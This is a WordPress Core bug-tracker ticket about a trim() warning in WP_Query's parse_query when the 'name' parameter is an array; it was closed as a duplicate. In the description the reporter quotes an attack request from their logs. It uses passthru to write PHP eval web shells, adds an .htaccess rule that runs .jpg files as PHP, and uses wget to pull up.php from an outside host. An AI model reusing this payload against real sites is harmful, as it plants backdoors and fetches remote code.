Make WordPress Core

Opened 6 years ago

Closed 6 years ago

#46797 closed defect (bug) (duplicate)

parse_query: E_WARNING: trim() expects parameter 1 to be string, array given

Reported by: conner_bw's profile conner_bw Owned by:
Milestone: Priority: normal
Severity: normal Version: 5.1
Component: Query Keywords:
Focuses: Cc:

Description

We keep seeing E_WARNING: trim() expects parameter 1 to be string, array given in our New Relic logs.

The problem is this line of code:

$qv['name'] = trim( $qv['name'] );

Source: https://github.com/WordPress/wordpress-develop/blob/a0ca5afd8977b5a3857084d9cb1bd345166e2f21/src/wp-includes/class-wp-query.php#L764

A (malicious) user sends a request that looks like:

> GET /?q=user/password&name[#post_render][]=passthru&name[#type]=markup&name[#markup]=echo 'Vuln!! patch it Now!' > vuln.htm; echo 'Vuln!!<?php @eval($_POST['pass']) ?>'> sites/default/files/vuln.php; echo 'Vuln!!<?php @eval($_POST['pass']) ?>'> vuln.php; cd sites/default/files/; echo 'AddType application/x-httpd-php .jpg' > .htaccess; wget 'http://40k.waszmann.de/Deutsch/images/up.php'

Such a request makes $qv['name'] an array, not a string.

Needs to be sanitized.

Change History (1)

#1 @SergeyBiryukov
6 years ago

  • Milestone Awaiting Review deleted
  • Resolution set to duplicate
  • Status changed from new to closed

Hi there, thanks for the report!

We're already tracking this issue in #17737.

Note: See TracTickets for help on using tickets.